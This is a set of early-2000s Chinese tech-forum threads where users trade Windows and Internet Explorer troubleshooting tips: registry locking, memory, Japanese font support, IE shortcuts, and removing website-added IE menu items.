yunbin 经典强盗 现任版主 积分：2397 发帖：1033 来自：火星 注册：2001-09-27 | 发表于 2002-01-25 14:16:45 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 用 regedit.exe 打开注册表，然后打开 HKEY_CURRENT_USER\Software\Microsoft\Windows\CrrentVersion\Polices\System，建一个 Dword 值 DisableRegistryTools，键值设为 1，这样就锁住了注册表 解锁 用记事本编辑一个任意名字的.reg文件，比如recover.reg，内容如下： REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem] "DisableRegistryTools"=dword:00000000 则双击运行recover.reg即可。(注意了，REGEDIT4下面一定要空一行。至于其他地方你空不空就无所谓啦。) A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
ajiao 终级用户 积分：575 发帖：182 来自：0412 注册：2001-03-14 | 发表于 2002-01-25 15:33:48 按此观看ajiao的个人资料 按此发邮件给ajiao ajiao 的 oicq 是870922,查看 870922 的资料 发送悄悄话给ajiao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ajiao的IP 是不是这样做，ie被修改这类的事情就不会发生。 到底有没有无需置疑的事情呢？
kacji 终级用户 积分：1014 发帖：299 来自：活火熔城 注册：2001-08-14 | 发表于 2002-01-25 16:54:43 按此观看kacji的个人资料 按此发邮件给kacji kacji 的 oicq 是156679,查看 156679 的资料 发送悄悄话给kacji 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kacji的IP 不是。 上面的操作只是不允许用注册表编辑器修改，其他的途径还是可以的。 我要让这天，再遮不住我眼 我要让这地，再埋不了我心 我要让众生，都明白我意 我要让诸佛，皆烟消云散
上一贴 | 下一贴
快速回复 主题：如何锁住注册表？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


如何才能有效地提高系统内存？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
如何才能有效地提高系统内存？

上一贴 | 下一贴
发表人 主题: 如何才能有效地提高系统内存？
天涯剑客

初级用户
积分：0
发帖：2
来自：
注册：2001-10-08
 发表于 2001-11-06 21:13:22 按此观看天涯剑客的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给天涯剑客 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天涯剑客的IP
如何才能有效地提高系统内存？
为何我的PC开机后的内存总是只有30%左右
我安装了一个内存整理软件，但是总是在运行过程中长时间没有反映。
有什么更好的办法可以更有效地提高系统内存呢？向各位高手请教。
solomon

锋子
积分：1706
发帖：2892
来自：Mahabrahman
注册：2001-04-01
 发表于 2001-11-06 21:32:04 按此观看solomon的个人资料 按此发邮件给solomon 访问solomon的主页 solomon 的 oicq 是2300666,查看 2300666 的资料 发送悄悄话给solomon 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看solomon的IP
物理内存有多大？

杀过毒嘛？

年轻人不要着急挣钱，
也不要着急建立什么关系！

重要的是先把自己的基础夯实！

挣钱不是挣一时，
要挣就挣一辈子！！！

Blueidea Web Team.
Team Spalpeen.

hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-06 21:37:40 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
加物理内存，还有就是用优化内存的软件（魔法兔子一类的）做下优化

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
天涯剑客

初级用户
积分：0
发帖：2
来自：
注册：2001-10-08
 发表于 2001-11-06 22:25:43 按此观看天涯剑客的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给天涯剑客 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天涯剑客的IP
谢谢答复！
我的物理内存是64M
我想我的PC应该没有病毒
solomon在上个帖子中说
引用:
物理内存有多大？

杀过毒嘛？

天涯剑客

初级用户
积分：0
发帖：2
来自：
注册：2001-10-08
 发表于 2001-11-06 22:27:38 按此观看天涯剑客的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给天涯剑客 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天涯剑客的IP
谢谢答复！
我已安装了优化内存的软件
不过整理时经常半天没反映
您还有其他方法吗？
hellslayer在上个帖子中说
引用:
加物理内存，还有就是用优化内存的软件（魔法兔子一类的）做下优化
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-06 22:37:38 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
你的内存现在看来似乎不大，看你是什么操作系统，越是接近21世纪的OS，越是吃内存。还有就是如果装了很多软件后，因为注册表的增大，会导致系统资源的极大的消耗，和整体速度的变慢。另外，对你系统分区的硬盘剩余空间也要注意，因为，随着内存的消耗，应用程序会占用硬盘做为缓寸，来提高读写速度，如果硬盘剩余空间不足，也会导致你说的情况。

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
darkvn

小混蛋
现任版主
积分：8295
发帖：2581
来自：不是外星
注册：2001-03-02
 发表于 2001-11-06 23:05:07 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
64m太小了，运行98也只是凑合。再怎么优化也没用拉。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
我的网站改版啦！==>vnv2
秋雁

超级用户
积分：408
发帖：124
来自：江苏
注册：2001-10-30
 发表于 2001-11-06 23:06:06 按此观看秋雁的个人资料 按此发邮件给秋雁 访问秋雁的主页 秋雁 的 oicq 是5480510,查看 5480510 的资料 发送悄悄话给秋雁 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看秋雁的IP
肯定是你的启动组内启动项目多导致！！！！建意修改注册表中的启动组中的选项，去除一些无用的选项！！！或用msconfig来修改启动组中的选项！！！然后在系统中把虚拟内存定为128，就可以了！！！

*********************************
*　 买论坛，空间，域名 就找我　 *
* 特别优惠供应，联系QQ 5480510 *
*********************************
秋雁

超级用户
积分：408
发帖：124
来自：江苏
注册：2001-10-30
 发表于 2001-11-06 23:10:28 按此观看秋雁的个人资料 按此发邮件给秋雁 访问秋雁的主页 秋雁 的 oicq 是5480510,查看 5480510 的资料 发送悄悄话给秋雁 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看秋雁的IP
darkvn在上个帖子中说
引用:
64m太小了，运行98也只是凑合。再怎么优化也没用拉。

谁说的，我现在用的就是64M，不是很好吗！！！

搞网站建设，PS，DW,FS,FLASH！！！！！

*********************************
*　 买论坛，空间，域名 就找我　 *
* 特别优惠供应，联系QQ 5480510 *
*********************************
darkvn

小混蛋
现任版主
积分：8295
发帖：2581
来自：不是外星
注册：2001-03-02
 发表于 2001-11-06 23:49:07 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
秋雁在上个帖子中说
引用:
darkvn在上个帖子中说
引用:
64m太小了，运行98也只是凑合。再怎么优化也没用拉。

谁说的，我现在用的就是64M，不是很好吗！！！

搞网站建设，PS，DW,FS,FLASH！！！！！

在我用k6200-32M的时候，我跟你感觉是一样的。

可是当我用上了新买的机子以后，我的感觉就变了。（althon1.4G-256DDR)

是对速度的感觉。呵呵。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
我的网站改版啦！==>vnv2
CrazyParty

群山之巅
积分：2491
发帖：922
来自：温州
注册：2000-10-14
 发表于 2001-11-07 09:22:13 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
秋雁在上个帖子中说
引用:
darkvn在上个帖子中说
引用:
64m太小了，运行98也只是凑合。再怎么优化也没用拉。

谁说的，我现在用的就是64M，不是很好吗！！！

搞网站建设，PS，DW,FS,FLASH！！！！！

不会吧，一些PSD图就有XXM的，你怎么打的开？64M的确是再怎么优化也就那样。

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
qixili

高级用户
积分：233
发帖：78
来自：毛里求斯
注册：2001-04-04
 发表于 2001-12-21 19:51:05 按此观看qixili的个人资料 按此发邮件给qixili 访问qixili的主页 qixili 的 oicq 是24523880,查看 24523880 的资料 发送悄悄话给qixili 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看qixili的IP
怎样删去启动组内启动项目多余的项目？

NO...还我中级用户！！！
yuzhiqing

终级用户
积分：747
发帖：439
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-21 20:54:36 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
点开始，在运行中输入msconfig，点启动就可以删了，去掉打的钩就可以了，不过有的软件在这里并不能阻止他加载的

WINDFLASH
::浅紫色FORUM::
上一贴 | 下一贴
快速回复 主题：如何才能有效地提高系统内存？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


我的日文字体出问题了。不能看日文网站 - 经 典 论 坛

计算机技术
我的日文字体出问题了。不能看日文网站

上一贴 | 下一贴
发表人 主题: 我的日文字体出问题了。不能看日文网站
蓝色

管理员|蓝色
积分：13927
发帖：6011
来自：China
注册：2000-06-16
 发表于 2002-02-11 13:55:48 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 收藏该主题供以后查看 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
不知道什么原因，到了日文站，显示的都是宋体乱码字，字体编码的菜单里也没有日文选择，也不提示安装。

以前都是正常的啊，有什么解决方案没有？

我错了，以前我是死不承认，现在需要常常认错。
认错后，再听那掠过林梢的歌唱。

Blueidea Web Team
Team Leader

话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-11 14:36:35 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP

我这个不是好方法(我现在里只想到这个 [image])，但可以用 ,

从新安装 ie ， 自定义安装 ，选择日语支持 ......

yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-02-11 14:41:54 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
win2000以上的系统都能手动添加~~ 在控制面板的区域和语言里面

最笨的办法~添加删除程序里面 选ie 用修复或添加 看看

再不行卸载ie 再自定制安装ie 希望支持的语言自己要的都选上~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-11 18:44:39 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
用搜索器找一个字体库的网站，下载一个，或者直接网上安装！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

xqlyg

超级用户
积分：362
发帖：92
来自：china
注册：2002-02-07
 发表于 2002-02-11 22:21:55 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
重新安装ie选择日文编码支持。
蓝色

管理员|蓝色
积分：13927
发帖：6011
来自：China
注册：2000-06-16
 发表于 2002-02-13 21:45:34 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
问题解决，首先在区域设置，去掉日文选项，重启。

没有解决

重新复选，再次安装，正常。

并且得出了一个奇怪的结果，证明 flash 5的action编辑窗口的源代专家编辑模式所用的字体为日文。

如果你在正常模式里，输入了中文，到专家模式，肯定会变成日本字乱码。大家可有解决方案？

我错了，以前我是死不承认，现在需要常常认错。
认错后，再听那掠过林梢的歌唱。

Blueidea Web Team
Team Leader

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-13 21:56:29 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
我也遇到过这个问题！

好象FLASH4的 也一样！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

爱老虎油

闪客作家
现任版主
积分：7267
发帖：2946
来自：西安
注册：2001-03-10
 发表于 2002-02-13 22:06:27 按此观看爱老虎油的个人资料 按此发邮件给爱老虎油 爱老虎油 的 oicq 是10507289,查看 10507289 的资料 发送悄悄话给爱老虎油 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看爱老虎油的IP
蓝色在上个帖子中说
引用:
问题解决，首先在区域设置，去掉日文选项，重启。

没有解决

重新复选，再次安装，正常。

并且得出了一个奇怪的结果，证明 flash 5的action编辑窗口的源代专家编辑模式所用的字体为日文。

如果你在正常模式里，输入了中文，到专家模式，肯定会变成日本字乱码。大家可有解决方案？

我靠，，，，我要做个阿拉伯文的FLASH，，有没有办法啊，
哈哈，，

爱所有会闪的油

Blueidea Web Team.
Moderator Of Flash forum

话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-14 08:32:08 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
微软的解释是采用 UNICODE 解决多语言跨平台的问题 ， 现在的版本已经到了2.1,按理说应该没有问题 ...

可以试试 windows 的多语言版本 （ 2000或xp都可以 ）

这两天给日本的客户调试几个系统 ，采 用winxp多国语言版（正版），可以很方便地进行各语种地切换操作，至少到目前为止，还没有发现语言输入与内码转换之类的冲突问题

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-14 10:07:33 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
有没有西博来文的！！
哈哈……………………………………

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

QUESTER

鼠标说话
是个版主
积分：2790
发帖：1293
来自：GTA
注册：2000-08-28
 发表于 2002-02-14 11:25:36 按此观看QUESTER的个人资料 按此发邮件给QUESTER 发送悄悄话给QUESTER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QUESTER的IP
蓝色在上个帖子中说
引用:
问题解决，首先在区域设置，去掉日文选项，重启。

没有解决

重新复选，再次安装，正常。

并且得出了一个奇怪的结果，证明 flash 5的action编辑窗口的源代专家编辑模式所用的字体为日文。

如果你在正常模式里，输入了中文，到专家模式，肯定会变成日本字乱码。大家可有解决方案？

不光这样，连播放器里面的内码都有日文呢！
解决显示问题，可以在系统字体管理里面删除一个 VGA的 Fon 后缀字库就解决了。（具体什么名字不记得了，找一下就知道了。不是TT字，是红A字的图标）

下载 ColorKey 试用版 解决配色问题
逢对手鼠标说话，仗一键快意恩仇！
...大象无形 大音稀声...
Blueidea Web Team
Moderator of Art & Design
蓝色

管理员|蓝色
积分：13927
发帖：6011
来自：China
注册：2000-06-16
 发表于 2002-02-14 11:53:53 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
准确点，这种字体不能乱删除，搞不好系统就起不来

我错了，以前我是死不承认，现在需要常常认错。
认错后，再听那掠过林梢的歌唱。

Blueidea Web Team
Team Leader

QUESTER

鼠标说话
是个版主
积分：2790
发帖：1293
来自：GTA
注册：2000-08-28
 发表于 2002-02-16 08:43:10 按此观看QUESTER的个人资料 按此发邮件给QUESTER 发送悄悄话给QUESTER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QUESTER的IP
蓝色在上个帖子中说
引用:
准确点，这种字体不能乱删除，搞不好系统就起不来

技巧：
    在flash编程代码输入有两种方式一种是普通模式，一种是专家模式。有很多人觉得专家模式下的字体怪怪的很难看清楚，有什么解决办法吗？

答案是肯定的，你只需找到你系统的字体目录，一般为：c:\windows\fonts，将带红色图标的modern字体删除便可。

下载 ColorKey 试用版 解决配色问题
逢对手鼠标说话，仗一键快意恩仇！
...大象无形 大音稀声...
Blueidea Web Team
Moderator of Art & Design
上一贴 | 下一贴
快速回复 主题：我的日文字体出问题了。不能看日文网站
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


IE常用快捷键. - 经 典 论 坛

计算机技术
IE常用快捷键.

上一贴 | 下一贴
发表人 主题: IE常用快捷键.
len

SlowHorse
积分：1198
发帖：572
来自：hebei
注册：2001-09-29
 发表于 2002-01-24 12:04:53 按此观看len的个人资料 按此发邮件给len 访问len的主页 len 的 oicq 是3248586,查看 3248586 的资料 收藏该主题供以后查看 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
CTRL+O(CTRL+L) 出现网址输入框.
CTRL+N 以当前页打开
CTRL+L 快速关闭当前窗口
CTRL+F5 刷新当前页
CTRL+F3 打开搜索栏
CTRL+D 将当前页添加到收藏夹
CTRL+B(CTRL+I) 打开收藏夹(整理收藏夹)
CTRL+H 查看历史记录
CTRL+S 保存当前页
CTRL+F 在当前页中查找
CTRL+A 选择全部网页
CTRL+P 打印所选文字等
F11 全屏/窗口
ALT+左箭头或空格 后退一页

UFO Bulletin Board ====> 不明飞行物
arrive

终级用户
积分：1298
发帖：433
来自：大连
注册：2000-12-02
 发表于 2002-01-25 02:08:04 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
查看和浏览 Web 页 按键 目的
F1 显示 Internet Explorer 帮助，或显示对话框中某个项目的相关帮助信息
F11 在全屏幕和常规浏览器窗口之间进行切换
TAB 在 Web 页、地址栏和链接栏中向前移动到下一个项目
SHIFT+TAB 在 Web 页、地址栏和链接栏中向后返回到上一个项目
ALT+HOME 进入您的主页
ALT+向右箭头 转到下一页
ALT+向左箭头或
BACKSPACE 返回前一页
SHIFT+F10 显示某个链接的快捷菜单
CTRL+TAB 或
F6 在不同框架之间向前移动
SHIFT+CTRL+TAB 在不同框架之间向后移动
向上箭头 向文档起始处滚动
向下箭头 向文档结尾处滚动
PAGE UP 向文档起始处翻页
PAGE DOWN 向文档结尾处翻页
HOME 移动到文档的开头
END 移动到文档的结尾
CTRL+F 在 Web 页中查找
F5 或
CTRL+R 仅当 Web 上的页面与本机存储的 Web 页时间戳不同时，才刷新当前 Web 页
CTRL+F5 即使 Web 上的页面与本机存储的 Web 页时间戳相同，仍然刷新当前 Web 页
ESC 停止下载 Web 页
CTRL+O 或
CTRL+L 转到新位置
CTRL+N 打开新窗口
CTRL+W 关闭当前窗口
CTRL+S 保存当前页
CTRL+P 打印当前页或当前框架
ENTER 激活选定的链接
CTRL+E 在浏览栏中打开搜索页
CTRL+I 在浏览栏中打开收藏夹
CTRL+H 在浏览栏中打开历史记录
CTRL+单击 在历史记录或收藏栏上，打开多个文件夹

使用地址栏 按键 目的
ALT+D 选择地址栏中的文字
F4 显示地址栏的历史记录
CTRL+向左箭头 在地址栏中时，将光标左移到相邻的逻辑分隔符（. 或 /）
CTRL+向右箭头 在地址栏中时，将光标右移到相邻的逻辑分隔符（. 或 /）
CTRL+ENTER 在地址栏中将“www.”添加到键入的文本的前面，将“.com”添加到文本的后面
向上箭头 在“自动完成”建议项的列表中向前移动
向下箭头 在“自动完成”建议项的列表中向后移动

使用收藏夹 按键 目的
CTRL+D 将当前 Web 页添加到收藏夹中
CTRL+B 打开“整理收藏夹”对话框
ALT+UP ARROW 在“整理收藏夹”对话框的“收藏夹”列表中向上移动所选项目
ALT+DOWN ARROW 在“整理收藏夹”对话框的“收藏夹”列表中向下移动所选项目

编辑 按键 目的
CTRL+X 删除所选项目并将其复制到剪贴板中
CTRL+C 将所选项目复制到剪贴板
CTRL+V 将剪贴板中的内容插入到所选位置
CTRL+A 选中当前 Web 页中的所有项目

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
中国坛中文网——网络技术版www.chinafen.com
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-01-25 08:44:38 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
好东西~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 主题：IE常用快捷键.
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


请教各位一个问题。 - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
请教各位一个问题。

上一贴 | 下一贴
发表人 主题: 请教各位一个问题。
figure

高级用户
积分：172
发帖：66
来自：吉安，江西，中国
注册：2000-01-30
 发表于 2001-12-05 10:27:08 按此观看figure的个人资料 按此发邮件给figure 访问figure的主页 figure 的 oicq 是86066,查看 86066 的资料 收藏该主题供以后查看 发送悄悄话给figure 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看figure的IP
在IE浏览器的“工具”栏下拉菜单里，有时因浏览了一些网页会自动添加了一个新项目，比如“精彩网址”等，用什么方法删除掉它呢？（用优化大师、超级兔子都不行；用 IE里的“查看”-“自定义”只能删掉横向工具栏里的项目，重新装过IE5.0好象也解决不了，不要教我重新格式化哟，我的硬盘没分区，不容易备份。） 多谢了！

Andy's Home
wHeN wErE sO fAr ApArT
CaN sAmEoNe BrEaK mY tEnDeR hEaRt
l u GiRl i ReAlLy Do
SlEeP sO sWeEt WhEn i ThInK oF u
aLl Of Is LiKe A rOsE
NiGhT iS hErE aNd I mUsT cLoSe
wItH yOu In ThOuGhT tHaT yOu R mIn
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2001-12-05 11:57:42 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Extensions\

包含入{FB5F1910-F110-11d2-BB9E-00C04F795683} 此类的几个项 查看相关内容 不要的删除~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

yuzhiqing

终级用户
积分：747
发帖：439
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-05 13:52:36 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
HKEY_LOCAL_user\Software\Microsoft\InternetExplorer\menuExt
就可以删除你不需要的网页了！~

WINDFLASH
::浅紫色FORUM::
lingduyu

初级用户
积分：125
发帖：34
来自：
注册：2001-04-03
 发表于 2002-01-28 09:57:41 按此观看lingduyu的个人资料 按此发邮件给lingduyu 发送悄悄话给lingduyu 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lingduyu的IP
yuzhiqing在上个帖子中说
引用:
HKEY_LOCAL_user\Software\Microsoft\InternetExplorer\menuExt
就可以删除你不需要的网页了！~

没有吧！你这个好象不能解决上面那位朋友的问题哦！我也试过，这个只能改右键的网址吧？！

我知道我又老又笨又多嘴....但我还是忍不住要问。
lingduyu

初级用户
积分：125
发帖：34
来自：
注册：2001-04-03
 发表于 2002-01-28 10:04:07 按此观看lingduyu的个人资料 按此发邮件给lingduyu 发送悄悄话给lingduyu 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lingduyu的IP
yunbin在上个帖子中说
引用:
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Extensions\

包含入{FB5F1910-F110-11d2-BB9E-00C04F795683} 此类的几个项 查看相关内容 不要的删除~

这位大哥，那么请问您一下那么我该如何区分这几个项目的相关内容呢？因为我也是深受此害啊！我的IE工具菜单里有什么“当当——音乐厅”，什么“填表专家”什么的！我不知道在哪里改呢？
还有呢！就是我的机子在每次启动的时候IE都会被指向一个叫“www.haody.net”的网址，见鬼，我都没去过啊？！

我知道我又老又笨又多嘴....但我还是忍不住要问。
上一贴 | 下一贴
快速回复 主题：请教各位一个问题。
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


如何去除打印html页面时的标题，页码和时间？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
如何去除打印html页面时的标题，页码和时间？

上一贴 | 下一贴
发表人 | 主题: 如何去除打印html页面时的标题，页码和时间？
